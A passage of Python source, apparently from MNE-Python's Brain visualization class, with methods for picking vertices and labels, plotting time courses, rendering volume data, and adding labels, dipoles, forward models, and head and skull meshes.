# ijk = np.round((pos - shift) / spacing).astype(int) # vertex_id = np.ravel_multi_index(ijk, shape, order='F') else: vtk_cell = mesh.GetCell(cell_id) cell = [vtk_cell.GetPointId(point_id) for point_id in range(vtk_cell.GetNumberOfPoints())] vertices = mesh.points[cell] idx = np.argmin(abs(vertices - pos), axis=0) vertex_id = cell[idx[0]] if self.traces_mode == 'label': self._add_label_glyph(hemi, mesh, vertex_id) else: self._add_vertex_glyph(hemi, mesh, vertex_id) def _add_label_glyph(self, hemi, mesh, vertex_id): if hemi == 'vol': return label_id = self._vertex_to_label_id[hemi][vertex_id] label = self._annotation_labels[hemi][label_id] # remove the patch if already picked if label_id in self.picked_patches[hemi]: self._remove_label_glyph(hemi, label_id) return if hemi == label.hemi: self.add_label(label, borders=True, reset_camera=False) self.picked_patches[hemi].append(label_id) def _remove_label_glyph(self, hemi, label_id): label = self._annotation_labels[hemi][label_id] label._line.remove() self.color_cycle.restore(label._color) self.mpl_canvas.update_plot() self._layered_meshes[hemi].remove_overlay(label.name) self.picked_patches[hemi].remove(label_id) def _add_vertex_glyph(self, hemi, mesh, vertex_id, update=True): if vertex_id in self.picked_points[hemi]: return # skip if the wrong hemi is selected if self.act_data_smooth[hemi][0] is None: return color = next(self.color_cycle) line = self.plot_time_course(hemi, vertex_id, color, update=update) if hemi == 'vol': ijk = np.unravel_index( vertex_id, np.array(mesh.GetDimensions()) - 1, order='F') # should just be GetCentroid(center), but apparently it's VTK9+: # center = np.empty(3) # voxel.GetCentroid(center) voxel = mesh.GetCell(*ijk) pts = voxel.GetPoints() n_pts = pts.GetNumberOfPoints() center = np.empty((n_pts, 3)) for ii in range(pts.GetNumberOfPoints()): pts.GetPoint(ii, center[ii]) center = np.mean(center, axis=0) else: center = mesh.GetPoints().GetPoint(vertex_id) del mesh # from the picked renderer to the subplot coords try: lst = self._renderer._all_renderers._renderers except AttributeError: lst = self._renderer._all_renderers rindex = lst.index(self.picked_renderer) row, col = self._renderer._index_to_loc(rindex) actors = list() spheres = list() for _ in self._iter_views(hemi): # Using _sphere() instead of renderer.sphere() for 2 reasons: # 1) renderer.sphere() fails on Windows in a scenario where a lot # of picking requests are done in a short span of time (could be # mitigated with synchronization/delay?) # 2) the glyph filter is used in renderer.sphere() but only one # sphere is required in this function. 
actor, sphere = self._renderer._sphere( center=np.array(center), color=color, radius=4.0, ) actors.append(actor) spheres.append(sphere) # add metadata for picking for sphere in spheres: sphere._is_glyph = True sphere._hemi = hemi sphere._line = line sphere._actors = actors sphere._color = color sphere._vertex_id = vertex_id self.picked_points[hemi].append(vertex_id) self._spheres.extend(spheres) self.pick_table[vertex_id] = spheres return sphere def _remove_vertex_glyph(self, mesh, render=True): vertex_id = mesh._vertex_id if vertex_id not in self.pick_table: return hemi = mesh._hemi color = mesh._color spheres = self.pick_table[vertex_id] spheres[0]._line.remove() self.mpl_canvas.update_plot() self.picked_points[hemi].remove(vertex_id) with warnings.catch_warnings(record=True): # We intentionally ignore these in case we have traversed the # entire color cycle warnings.simplefilter('ignore') self.color_cycle.restore(color) for sphere in spheres: # remove all actors self.plotter.remove_actor(sphere._actors, render=render) sphere._actors = None self._spheres.pop(self._spheres.index(sphere)) self.pick_table.pop(vertex_id) def clear_glyphs(self): """Clear the picking glyphs.""" if not self.time_viewer: return for sphere in list(self._spheres): # will remove itself, so copy self._remove_vertex_glyph(sphere, render=False) assert sum(len(v) for v in self.picked_points.values()) == 0 assert len(self.pick_table) == 0 assert len(self._spheres) == 0 for hemi in self._hemis: for label_id in list(self.picked_patches[hemi]): self._remove_label_glyph(hemi, label_id) assert sum(len(v) for v in self.picked_patches.values()) == 0 if self.rms is not None: self.rms.remove() self.rms = None self._renderer._update() def plot_time_course(self, hemi, vertex_id, color, update=True): """Plot the vertex time course. Parameters ---------- hemi : str The hemisphere id of the vertex. vertex_id : int The vertex identifier in the mesh. color : matplotlib color The color of the time course. update : bool Force an update of the plot. Defaults to True. Returns ------- line : matplotlib object The time line object. """ if self.mpl_canvas is None: return time = self._data['time'].copy() # avoid circular ref mni = None if hemi == 'vol': hemi_str = 'V' xfm = read_talxfm( self._subject_id, self._subjects_dir) if self._units == 'mm': xfm['trans'][:3, 3] *= 1000. ijk = np.unravel_index( vertex_id, self._data[hemi]['grid_shape'], order='F') src_mri_t = self._data[hemi]['grid_src_mri_t'] mni = apply_trans(np.dot(xfm['trans'], src_mri_t), ijk) else: hemi_str = 'L' if hemi == 'lh' else 'R' try: mni = vertex_to_mni( vertices=vertex_id, hemis=0 if hemi == 'lh' else 1, subject=self._subject_id, subjects_dir=self._subjects_dir ) except Exception: mni = None if mni is not None: mni = ' MNI: ' + ', '.join('%5.1f' % m for m in mni) else: mni = '' label = "{}:{}{}".format(hemi_str, str(vertex_id).ljust(6), mni) act_data, smooth = self.act_data_smooth[hemi] if smooth is not None: act_data = smooth[vertex_id].dot(act_data)[0] else: act_data = act_data[vertex_id].copy() line = self.mpl_canvas.plot( time, act_data, label=label, lw=1., color=color, zorder=4, update=update, ) return line def plot_time_line(self, update=True): """Add the time line to the MPL widget. Parameters ---------- update : bool Force an update of the plot. Defaults to True. 
""" if self.mpl_canvas is None: return if isinstance(self.show_traces, bool) and self.show_traces: # add time information current_time = self._current_time if not hasattr(self, "time_line"): self.time_line = self.mpl_canvas.plot_time_line( x=current_time, label='time', color=self._fg_color, lw=1, update=update, ) self.time_line.set_xdata(current_time) if update: self.mpl_canvas.update_plot() def _configure_help(self): pairs = [ ('?', 'Display help window'), ('i', 'Toggle interface'), ('s', 'Apply auto-scaling'), ('r', 'Restore original clim'), ('c', 'Clear all traces'), ('n', 'Shift the time forward by the playback speed'), ('b', 'Shift the time backward by the playback speed'), ('Space', 'Start/Pause playback'), ('Up', 'Decrease camera elevation angle'), ('Down', 'Increase camera elevation angle'), ('Left', 'Decrease camera azimuth angle'), ('Right', 'Increase camera azimuth angle'), ] text1, text2 = zip(*pairs) text1 = '\n'.join(text1) text2 = '\n'.join(text2) self.help_canvas = self._renderer._window_get_simple_canvas( width=5, height=2, dpi=80) _show_help_fig( col1=text1, col2=text2, fig_help=self.help_canvas.fig, ax=self.help_canvas.axes, show=False, ) def help(self): """Display the help window.""" self.help_canvas.show() def _clear_callbacks(self): if not hasattr(self, 'callbacks'): return for callback in self.callbacks.values(): if callback is not None: for key in ('plotter', 'brain', 'callback', 'widget', 'widgets'): setattr(callback, key, None) self.callbacks.clear() # Remove the default key binding if getattr(self, "iren", None) is not None: self.plotter.iren.clear_key_event_callbacks() def _clear_widgets(self): if not hasattr(self, 'widgets'): return for widget in self.widgets.values(): if widget is not None: for key in ('triggered', 'valueChanged'): setattr(widget, key, None) self.widgets.clear() @property def interaction(self): """The interaction style.""" return self._interaction @interaction.setter def interaction(self, interaction): """Set the interaction style.""" _validate_type(interaction, str, 'interaction') _check_option('interaction', interaction, ('trackball', 'terrain')) for _ in self._iter_views('vol'): # will traverse all self._renderer.set_interaction(interaction) def _cortex_colormap(self, cortex): """Return the colormap corresponding to the cortex.""" from .._3d import _get_cmap from matplotlib.colors import ListedColormap colormap_map = dict(classic=dict(colormap="Greys", vmin=-1, vmax=2), high_contrast=dict(colormap="Greys", vmin=-.1, vmax=1.3), low_contrast=dict(colormap="Greys", vmin=-5, vmax=5), bone=dict(colormap="bone_r", vmin=-.2, vmax=2), ) _validate_type(cortex, (str, dict, list, tuple), 'cortex') if isinstance(cortex, str): if cortex in colormap_map: cortex = colormap_map[cortex] else: cortex = [cortex] * 2 if isinstance(cortex, (list, tuple)): _check_option('len(cortex)', len(cortex), (2, 3), extra='when cortex is a list or tuple') if len(cortex) == 3: cortex = [cortex] * 2 cortex = list(cortex) for ci, c in enumerate(cortex): cortex[ci] = _to_rgb(c, name='cortex') cortex = dict( colormap=ListedColormap(cortex, name='custom binary'), vmin=0, vmax=1) cortex = dict( vmin=float(cortex['vmin']), vmax=float(cortex['vmax']), colormap=_get_cmap(cortex['colormap']), ) return cortex def _remove(self, item, render=False): """Remove actors from the rendered scene.""" if item in self._actors: logger.debug( f'Removing {len(self._actors[item])} {item} actor(s)') for actor in self._actors[item]: self._renderer.plotter.remove_actor(actor) self._actors.pop(item) # 
remove actor list if render: self._renderer._update() def _add_actor(self, item, actor): """Add an actor to the internal register.""" if item in self._actors: # allows adding more than one self._actors[item].append(actor) else: self._actors[item] = [actor] @verbose def add_data(self, array, fmin=None, fmid=None, fmax=None, thresh=None, center=None, transparent=False, colormap="auto", alpha=1, vertices=None, smoothing_steps=None, time=None, time_label="auto", colorbar=True, hemi=None, remove_existing=None, time_label_size=None, initial_time=None, scale_factor=None, vector_alpha=None, clim=None, src=None, volume_options=0.4, colorbar_kwargs=None, verbose=None): """Display data from a numpy array on the surface or volume. This provides a similar interface to :meth:`surfer.Brain.add_overlay`, but it displays it with a single colormap. It offers more flexibility over the colormap, and provides a way to display four-dimensional data (i.e., a timecourse) or five-dimensional data (i.e., a vector-valued timecourse). .. note:: ``fmin`` sets the low end of the colormap, and is separate from thresh (this is a different convention from :meth:`surfer.Brain.add_overlay`). Parameters ---------- array : numpy array, shape (n_vertices[, 3][, n_times]) Data array. For the data to be understood as vector-valued (3 values per vertex corresponding to X/Y/Z surface RAS), then ``array`` must be have all 3 dimensions. If vectors with no time dimension are desired, consider using a singleton (e.g., ``np.newaxis``) to create a "time" dimension and pass ``time_label=None`` (vector values are not supported). %(fmin_fmid_fmax)s %(thresh)s %(center)s %(transparent)s colormap : str, list of color, or array Name of matplotlib colormap to use, a list of matplotlib colors, or a custom look up table (an n x 4 array coded with RBGA values between 0 and 255), the default "auto" chooses a default divergent colormap, if "center" is given (currently "icefire"), otherwise a default sequential colormap (currently "rocket"). alpha : float in [0, 1] Alpha level to control opacity of the overlay. vertices : numpy array Vertices for which the data is defined (needed if ``len(data) < nvtx``). smoothing_steps : int or None Number of smoothing steps (smoothing is used if len(data) < nvtx) The value 'nearest' can be used too. None (default) will use as many as necessary to fill the surface. time : numpy array Time points in the data array (if data is 2D or 3D). %(time_label)s colorbar : bool Whether to add a colorbar to the figure. Can also be a tuple to give the (row, col) index of where to put the colorbar. hemi : str | None If None, it is assumed to belong to the hemisphere being shown. If two hemispheres are being shown, an error will be thrown. remove_existing : bool Not supported yet. Remove surface added by previous "add_data" call. Useful for conserving memory when displaying different data in a loop. time_label_size : int Font size of the time label (default 14). initial_time : float | None Time initially shown in the plot. ``None`` to use the first time sample (default). scale_factor : float | None (default) The scale factor to use when displaying glyphs for vector-valued data. vector_alpha : float | None Alpha level to control opacity of the arrows. Only used for vector-valued data. If None (default), ``alpha`` is used. clim : dict Original clim arguments. %(src_volume_options)s colorbar_kwargs : dict | None Options to pass to :meth:`pyvista.Plotter.add_scalar_bar` (e.g., ``dict(title_font_size=10)``). 
%(verbose)s Notes ----- If the data is defined for a subset of vertices (specified by the "vertices" parameter), a smoothing method is used to interpolate the data onto the high resolution surface. If the data is defined for subsampled version of the surface, smoothing_steps can be set to None, in which case only as many smoothing steps are applied until the whole surface is filled with non-zeros. Due to a VTK alpha rendering bug, ``vector_alpha`` is clamped to be strictly < 1. """ _validate_type(transparent, bool, 'transparent') _validate_type(vector_alpha, ('numeric', None), 'vector_alpha') _validate_type(scale_factor, ('numeric', None), 'scale_factor') # those parameters are not supported yet, only None is allowed _check_option('thresh', thresh, [None]) _check_option('remove_existing', remove_existing, [None]) _validate_type(time_label_size, (None, 'numeric'), 'time_label_size') if time_label_size is not None: time_label_size = float(time_label_size) if time_label_size < 0: raise ValueError('time_label_size must be positive, got ' f'{time_label_size}') hemi = self._check_hemi(hemi, extras=['vol']) stc, array, vertices = self._check_stc(hemi, array, vertices) array = np.asarray(array) vector_alpha = alpha if vector_alpha is None else vector_alpha self._data['vector_alpha'] = vector_alpha self._data['scale_factor'] = scale_factor # Create time array and add label if > 1D if array.ndim <= 1: time_idx = 0 else: # check time array if time is None: time = np.arange(array.shape[-1]) else: time = np.asarray(time) if time.shape != (array.shape[-1],): raise ValueError('time has shape %s, but need shape %s ' '(array.shape[-1])' % (time.shape, (array.shape[-1],))) self._data["time"] = time if self._n_times is None: self._times = time elif len(time) != self._n_times: raise ValueError("New n_times is different from previous " "n_times") elif not np.array_equal(time, self._times): raise ValueError("Not all time values are consistent with " "previously set times.") # initial time if initial_time is None: time_idx = 0 else: time_idx = self._to_time_index(initial_time) # time label time_label, _ = _handle_time(time_label, 's', time) y_txt = 0.05 + 0.1 * bool(colorbar) if array.ndim == 3: if array.shape[1] != 3: raise ValueError('If array has 3 dimensions, array.shape[1] ' 'must equal 3, got %s' % (array.shape[1],)) fmin, fmid, fmax = _update_limits( fmin, fmid, fmax, center, array ) if colormap == 'auto': colormap = 'mne' if center is not None else 'hot' if smoothing_steps is None: smoothing_steps = 7 elif smoothing_steps == 'nearest': smoothing_steps = -1 elif isinstance(smoothing_steps, int): if smoothing_steps < 0: raise ValueError('Expected value of `smoothing_steps` is' ' positive but {} was given.'.format( smoothing_steps)) else: raise TypeError('Expected type of `smoothing_steps` is int or' ' NoneType but {} was given.'.format( type(smoothing_steps))) self._data['stc'] = stc self._data['src'] = src self._data['smoothing_steps'] = smoothing_steps self._data['clim'] = clim self._data['time'] = time self._data['initial_time'] = initial_time self._data['time_label'] = time_label self._data['initial_time_idx'] = time_idx self._data['time_idx'] = time_idx self._data['transparent'] = transparent # data specific for a hemi self._data[hemi] = dict() self._data[hemi]['glyph_dataset'] = None self._data[hemi]['glyph_mapper'] = None self._data[hemi]['glyph_actor'] = None self._data[hemi]['array'] = array self._data[hemi]['vertices'] = vertices self._data['alpha'] = alpha self._data['colormap'] = colormap 
self._data['center'] = center self._data['fmin'] = fmin self._data['fmid'] = fmid self._data['fmax'] = fmax self.update_lut() # 1) add the surfaces first actor = None for _ in self._iter_views(hemi): if hemi in ('lh', 'rh'): actor = self._layered_meshes[hemi]._actor else: src_vol = src[2:] if src.kind == 'mixed' else src actor, _ = self._add_volume_data(hemi, src_vol, volume_options) assert actor is not None # should have added one self._add_actor('data', actor) # 2) update time and smoothing properties # set_data_smoothing calls "set_time_point" for us, which will set # _current_time self.set_time_interpolation(self.time_interpolation) self.set_data_smoothing(self._data['smoothing_steps']) # 3) add the other actors if colorbar is True: # bottom left by default colorbar = (self._subplot_shape[0] - 1, 0) for ri, ci, v in self._iter_views(hemi): # Add the time label to the bottommost view do = (ri, ci) == colorbar if not self._time_label_added and time_label is not None and do: time_actor = self._renderer.text2d( x_window=0.95, y_window=y_txt, color=self._fg_color, size=time_label_size, text=time_label(self._current_time), justification='right' ) self._data['time_actor'] = time_actor self._time_label_added = True if colorbar and self._scalar_bar is None and do: kwargs = dict(source=actor, n_labels=8, color=self._fg_color, bgcolor=self._brain_color[:3]) kwargs.update(colorbar_kwargs or {}) self._scalar_bar = self._renderer.scalarbar(**kwargs) self._renderer.set_camera( update=False, reset_camera=False, **views_dicts[hemi][v]) # 4) update the scalar bar and opacity self.update_lut(alpha=alpha) def remove_data(self): """Remove rendered data from the mesh.""" self._remove('data', render=True) def _iter_views(self, hemi): """Iterate over rows and columns that need to be added to.""" hemi_dict = dict(lh=[0], rh=[0], vol=[0]) if self._hemi == 'split': hemi_dict.update(rh=[1], vol=[0, 1]) for vi, view in enumerate(self._views): view_dict = dict(lh=[vi], rh=[vi], vol=[vi]) if self._hemi == 'split': view_dict.update(vol=[vi, vi]) if self._view_layout == 'vertical': rows, cols = view_dict, hemi_dict # views are rows, hemis cols else: rows, cols = hemi_dict, view_dict # hemis are rows, views cols for ri, ci in zip(rows[hemi], cols[hemi]): self._renderer.subplot(ri, ci) yield ri, ci, view def remove_labels(self): """Remove all the ROI labels from the image.""" for hemi in self._hemis: mesh = self._layered_meshes[hemi] for label in self._labels[hemi]: mesh.remove_overlay(label.name) self._labels[hemi].clear() self._renderer._update() def remove_annotations(self): """Remove all annotations from the image.""" for hemi in self._hemis: mesh = self._layered_meshes[hemi] mesh.remove_overlay(self._annots[hemi]) self._annots[hemi].clear() self._renderer._update() def _add_volume_data(self, hemi, src, volume_options): from ..backends._pyvista import _hide_testing_actor _validate_type(src, SourceSpaces, 'src') _check_option('src.kind', src.kind, ('volume',)) _validate_type( volume_options, (dict, 'numeric', None), 'volume_options') assert hemi == 'vol' if not isinstance(volume_options, dict): volume_options = dict( resolution=float(volume_options) if volume_options is not None else None) volume_options = _handle_default('volume_options', volume_options) allowed_types = ( ['resolution', (None, 'numeric')], ['blending', (str,)], ['alpha', ('numeric', None)], ['surface_alpha', (None, 'numeric')], ['silhouette_alpha', (None, 'numeric')], ['silhouette_linewidth', ('numeric',)], ) for key, types in allowed_types: 
_validate_type(volume_options[key], types, f'volume_options[{repr(key)}]') extra_keys = set(volume_options) - set(a[0] for a in allowed_types) if len(extra_keys): raise ValueError( f'volume_options got unknown keys {sorted(extra_keys)}') blending = _check_option('volume_options["blending"]', volume_options['blending'], ('composite', 'mip')) alpha = volume_options['alpha'] if alpha is None: alpha = 0.4 if self._data[hemi]['array'].ndim == 3 else 1. alpha = np.clip(float(alpha), 0., 1.) resolution = volume_options['resolution'] surface_alpha = volume_options['surface_alpha'] if surface_alpha is None: surface_alpha = min(alpha / 2., 0.1) silhouette_alpha = volume_options['silhouette_alpha'] if silhouette_alpha is None: silhouette_alpha = surface_alpha / 4. silhouette_linewidth = volume_options['silhouette_linewidth'] del volume_options volume_pos = self._data[hemi].get('grid_volume_pos') volume_neg = self._data[hemi].get('grid_volume_neg') center = self._data['center'] if volume_pos is None: xyz = np.meshgrid( *[np.arange(s) for s in src[0]['shape']], indexing='ij') dimensions = np.array(src[0]['shape'], int) mult = 1000 if self._units == 'mm' else 1 src_mri_t = src[0]['src_mri_t']['trans'].copy() src_mri_t[:3] *= mult if resolution is not None: resolution = resolution * mult / 1000. # to mm del src, mult coords = np.array([c.ravel(order='F') for c in xyz]).T coords = apply_trans(src_mri_t, coords) self.geo[hemi] = Bunch(coords=coords) vertices = self._data[hemi]['vertices'] assert self._data[hemi]['array'].shape[0] == len(vertices) # MNE constructs the source space on a uniform grid in MRI space, # but mne coreg can change it to be non-uniform, so we need to # use all three elements here assert np.allclose( src_mri_t[:3, :3], np.diag(np.diag(src_mri_t)[:3])) spacing = np.diag(src_mri_t)[:3] origin = src_mri_t[:3, 3] - spacing / 2. scalars = np.zeros(np.prod(dimensions)) scalars[vertices] = 1. # for the outer mesh grid, grid_mesh, volume_pos, volume_neg = \ self._renderer._volume(dimensions, origin, spacing, scalars, surface_alpha, resolution, blending, center) self._data[hemi]['alpha'] = alpha # incorrectly set earlier self._data[hemi]['grid'] = grid self._data[hemi]['grid_mesh'] = grid_mesh self._data[hemi]['grid_coords'] = coords self._data[hemi]['grid_src_mri_t'] = src_mri_t self._data[hemi]['grid_shape'] = dimensions self._data[hemi]['grid_volume_pos'] = volume_pos self._data[hemi]['grid_volume_neg'] = volume_neg actor_pos, _ = self._renderer.plotter.add_actor( volume_pos, reset_camera=False, name=None, culling=False, render=False) actor_neg = actor_mesh = None if volume_neg is not None: actor_neg, _ = self._renderer.plotter.add_actor( volume_neg, reset_camera=False, name=None, culling=False, render=False) grid_mesh = self._data[hemi]['grid_mesh'] if grid_mesh is not None: actor_mesh, prop = self._renderer.plotter.add_actor( grid_mesh, reset_camera=False, name=None, culling=False, pickable=False, render=False) prop.SetColor(*self._brain_color[:3]) prop.SetOpacity(surface_alpha) if silhouette_alpha > 0 and silhouette_linewidth > 0: for _ in self._iter_views('vol'): self._renderer._silhouette( mesh=grid_mesh.GetInput(), color=self._brain_color[:3], line_width=silhouette_linewidth, alpha=silhouette_alpha, ) for actor in (actor_pos, actor_neg, actor_mesh): if actor is not None: _hide_testing_actor(actor) return actor_pos, actor_neg def add_label(self, label, color=None, alpha=1, scalar_thresh=None, borders=False, hemi=None, subdir=None, reset_camera=True): """Add an ROI label to the image. 
Parameters ---------- label : str | instance of Label Label filepath or name. Can also be an instance of an object with attributes "hemi", "vertices", "name", and optionally "color" and "values" (if scalar_thresh is not None). color : matplotlib-style color | None Anything matplotlib accepts: string, RGB, hex, etc. (default "crimson"). alpha : float in [0, 1] Alpha level to control opacity. scalar_thresh : None | float Threshold the label ids using this value in the label file's scalar field (i.e. label only vertices with scalar >= thresh). borders : bool | int Show only label borders. If int, specify the number of steps (away from the true border) along the cortical mesh to include as part of the border definition. hemi : str | None If None, it is assumed to belong to the hemipshere being shown. subdir : None | str If a label is specified as name, subdir can be used to indicate that the label file is in a sub-directory of the subject's label directory rather than in the label directory itself (e.g. for ``$SUBJECTS_DIR/$SUBJECT/label/aparc/lh.cuneus.label`` ``brain.add_label('cuneus', subdir='aparc')``). reset_camera : bool If True, reset the camera view after adding the label. Defaults to True. Notes ----- To remove previously added labels, run Brain.remove_labels(). """ from ...label import read_label if isinstance(label, str): if color is None: color = "crimson" if os.path.isfile(label): filepath = label label = read_label(filepath) hemi = label.hemi label_name = os.path.basename(filepath).split('.')[1] else: hemi = self._check_hemi(hemi) label_name = label label_fname = ".".join([hemi, label_name, 'label']) if subdir is None: filepath = op.join(self._subjects_dir, self._subject_id, 'label', label_fname) else: filepath = op.join(self._subjects_dir, self._subject_id, 'label', subdir, label_fname) if not os.path.exists(filepath): raise ValueError('Label file %s does not exist' % filepath) label = read_label(filepath) ids = label.vertices scalars = label.values else: # try to extract parameters from label instance try: hemi = label.hemi ids = label.vertices if label.name is None: label.name = 'unnamed' + str(self._unnamed_label_id) self._unnamed_label_id += 1 label_name = str(label.name) if color is None: if hasattr(label, 'color') and label.color is not None: color = label.color else: color = "crimson" if scalar_thresh is not None: scalars = label.values except Exception: raise ValueError('Label was not a filename (str), and could ' 'not be understood as a class. 
The class ' 'must have attributes "hemi", "vertices", ' '"name", and (if scalar_thresh is not None)' '"values"') hemi = self._check_hemi(hemi) if scalar_thresh is not None: ids = ids[scalars >= scalar_thresh] if self.time_viewer and self.show_traces \ and self.traces_mode == 'label': stc = self._data["stc"] src = self._data["src"] tc = stc.extract_label_time_course(label, src=src, mode=self.label_extract_mode) tc = tc[0] if tc.ndim == 2 else tc[0, 0, :] color = next(self.color_cycle) line = self.mpl_canvas.plot( self._data['time'], tc, label=label_name, color=color) else: line = None orig_color = color color = _to_rgb(color, alpha, alpha=True) cmap = np.array([(0, 0, 0, 0,), color]) ctable = np.round(cmap * 255).astype(np.uint8) scalars = np.zeros(self.geo[hemi].coords.shape[0]) scalars[ids] = 1 if borders: keep_idx = _mesh_borders(self.geo[hemi].faces, scalars) show = np.zeros(scalars.size, dtype=np.int64) if isinstance(borders, int): for _ in range(borders): keep_idx = np.in1d( self.geo[hemi].faces.ravel(), keep_idx) keep_idx.shape = self.geo[hemi].faces.shape keep_idx = self.geo[hemi].faces[np.any( keep_idx, axis=1)] keep_idx = np.unique(keep_idx) show[keep_idx] = 1 scalars *= show for _, _, v in self._iter_views(hemi): mesh = self._layered_meshes[hemi] mesh.add_overlay( scalars=scalars, colormap=ctable, rng=[np.min(scalars), np.max(scalars)], opacity=alpha, name=label_name, ) if reset_camera: self._renderer.set_camera(update=False, **views_dicts[hemi][v]) if self.time_viewer and self.show_traces \ and self.traces_mode == 'label': label._color = orig_color label._line = line self._labels[hemi].append(label) self._renderer._update() @fill_doc def add_forward(self, fwd, trans, alpha=1, scale=None): """Add a quiver to render positions of dipoles. Parameters ---------- %(fwd)s %(trans_not_none)s %(alpha)s Default 1. scale : None | float The size of the arrow representing the dipoles in :class:`mne.viz.Brain` units. Default 1.5mm. Notes ----- .. versionadded:: 1.0 """ head_mri_t = _get_trans(trans, 'head', 'mri', allow_none=False)[0] del trans if scale is None: scale = 1.5 if self._units == 'mm' else 1.5e-3 error_msg = ('Unexpected forward model coordinate frame ' '{}, must be "head" or "mri"') if fwd['coord_frame'] in _frame_to_str: fwd_frame = _frame_to_str[fwd['coord_frame']] if fwd_frame == 'mri': fwd_trans = Transform('mri', 'mri') elif fwd_frame == 'head': fwd_trans = head_mri_t else: raise RuntimeError(error_msg.format(fwd_frame)) else: raise RuntimeError(error_msg.format(fwd['coord_frame'])) for actor in _plot_forward( self._renderer, fwd, fwd_trans, fwd_scale=1e3 if self._units == 'mm' else 1, scale=scale, alpha=alpha): self._add_actor('forward', actor) self._renderer._update() def remove_forward(self): """Remove forward sources from the rendered scene.""" self._remove('forward', render=True) @fill_doc def add_dipole(self, dipole, trans, colors='red', alpha=1, scales=None): """Add a quiver to render positions of dipoles. Parameters ---------- dipole : instance of Dipole Dipole object containing position, orientation and amplitude of one or more dipoles or in the forward solution. %(trans_not_none)s colors : list | matplotlib-style color | None A single color or list of anything matplotlib accepts: string, RGB, hex, etc. Default red. %(alpha)s Default 1. scales : list | float | None The size of the arrow representing the dipole in :class:`mne.viz.Brain` units. Default 5mm. Notes ----- .. 
versionadded:: 1.0 """ head_mri_t = _get_trans(trans, 'head', 'mri', allow_none=False)[0] del trans n_dipoles = len(dipole) if not isinstance(colors, (list, tuple)): colors = [colors] * n_dipoles # make into list if len(colors) != n_dipoles: raise ValueError(f'The number of colors ({len(colors)}) ' f'and dipoles ({n_dipoles}) must match') colors = [_to_rgb(color, name=f'colors[{ci}]') for ci, color in enumerate(colors)] if scales is None: scales = 5 if self._units == 'mm' else 5e-3 if not isinstance(scales, (list, tuple)): scales = [scales] * n_dipoles # make into list if len(scales) != n_dipoles: raise ValueError(f'The number of scales ({len(scales)}) ' f'and dipoles ({n_dipoles}) must match') pos = apply_trans(head_mri_t, dipole.pos) pos *= 1e3 if self._units == 'mm' else 1 for _ in self._iter_views('vol'): for this_pos, this_ori, color, scale in zip( pos, dipole.ori, colors, scales): actor, _ = self._renderer.quiver3d( *this_pos, *this_ori, color=color, opacity=alpha, mode='arrow', scale=scale, scale_mode='scalar', scalars=[1]) self._add_actor('dipole', actor) self._renderer._update() def remove_dipole(self): """Remove dipole objects from the rendered scene.""" self._remove('dipole', render=True) @fill_doc def add_head(self, dense=True, color='gray', alpha=0.5): """Add a mesh to render the outer head surface. Parameters ---------- dense : bool Whether to plot the dense head (``seghead``) or the less dense head (``head``). %(color_matplotlib)s %(alpha)s Notes ----- .. versionadded:: 0.24 """ # load head surf = _get_head_surface('seghead' if dense else 'head', self._subject_id, self._subjects_dir) verts, triangles = surf['rr'], surf['tris'] verts *= 1e3 if self._units == 'mm' else 1 color = _to_rgb(color) for _ in self._iter_views('vol'): actor, _ = self._renderer.mesh( *verts.T, triangles=triangles, color=color, opacity=alpha, reset_camera=False, render=False) self._add_actor('head', actor) self._renderer._update() def remove_head(self): """Remove head objects from the rendered scene.""" self._remove('head', render=True) @fill_doc def add_skull(self, outer=True, color='gray', alpha=0.5): """Add a mesh to render the skull surface. Parameters ---------- outer : bool Adds the outer skull if ``True``, otherwise adds the inner skull. %(color_matplotlib)s %(alpha)s Notes ----- .. versionadded:: 0.24 """ surf = _get_skull_surface('outer' if outer else 'inner', self._subject_id, self._subjects_dir) verts, triangles = surf['rr'], surf['tris'] verts *= 1e3 if self._units == 'mm' else 1 color = _to_rgb(color) for _ in self._iter_views('vol'): actor, _ = self._renderer.mesh( *verts.T, triangles=triangles, color=color, opacity=alpha, reset_camera=False, render=False) self._add_actor('skull', actor) self._renderer._update() def remove_skull(self): """Remove skull objects from the rendered scene.""" self._remove('skull', render=True) @fill_doc def add_volume_labels(self, aseg='aparc+aseg', labels=None, colors=None, alpha=0.5, smooth=0.9, fill_hole_size=None, legend=None): """Add labels to the rendering from an anatomical segmentation. Parameters ---------- %(aseg)s labels : list Labeled regions of interest to plot. See :func:`mne.get_montage_volume_labels` for one way to determine regions of interest. Regions can also be chosen from the :term:`FreeSurfer LUT`. colors : list | matplotlib-style color | None A list of anything matplotlib accepts: string, RGB, hex, etc. (default :term:`FreeSurfer LUT` colors). 
%(alpha)s %(smooth)s fill_hole_size : int | None The size of holes to remove in the mesh in voxels. Default is None, no holes are removed. Warning, this dilates the boundaries of the surface by ``fill_hole_size`` number of voxels so use the minimal size. legend : bool | None | dict Add a legend displaying the names of the ``labels``. Default (None) is ``True`` if the number of ``labels`` is 10 or fewer. Can also be a dict of ``kwargs`` to pass to :meth:`pyvista.Plotter.add_legend`. Notes ----- .. versionadded:: 0.24 """ import nibabel as nib # load anatomical segmentation image if not aseg.endswith('aseg'): raise RuntimeError( f'`aseg` file path must end with "aseg", got {aseg}') aseg = _check_fname(op.join(self._subjects_dir, self._subject_id, 'mri', aseg + '.mgz'), overwrite='read', must_exist=True) aseg_fname = aseg aseg = nib.load(aseg_fname) aseg_data = np.asarray(aseg.dataobj) vox_mri_t = aseg.header.get_vox2ras_tkr() mult = 1e-3 if self._units == 'm' else 1 vox_mri_t[:3] *= mult del aseg # read freesurfer lookup table lut, fs_colors = read_freesurfer_lut() if labels is None: # assign default ROI labels based on indices lut_r = {v: k for k, v in lut.items()} labels = [lut_r[idx] for idx in DEFAULTS['volume_label_indices']] _validate_type(fill_hole_size, (int, None), 'fill_hole_size') _validate_type(legend, (bool, None), 'legend') if legend is None: legend = len(labels) < 11 if colors is None: colors = [fs_colors[label] / 255 for label in labels] elif not isinstance(colors, (list, tuple)): colors = [colors] * len(labels) # make into list colors = [_to_rgb(color, name=f'colors[{ci}]') for ci, color in enumerate(colors)] surfs = _marching_cubes( aseg_data, [lut[label] for label in labels], smooth=smooth, fill_hole_size=fill_hole_size) for label, color, (verts, triangles) in zip(labels, colors, surfs): if len(verts) == 0: # not in aseg vals warn(f'Value {lut[label]} not found for label ' f'{repr(label)} in: {aseg_fname}') continue verts = apply_trans(vox_mri_t, verts) for _ in self._iter_views('vol'): actor, _ = self._renderer.mesh( *verts.T, triangles=triangles, color=color, opacity=alpha, reset_camera=False, render=False) self._add_actor('volume_labels', actor) if legend or isinstance(legend, dict): # use empty kwargs for legend = True legend = legend if isinstance(legend, dict) else dict() 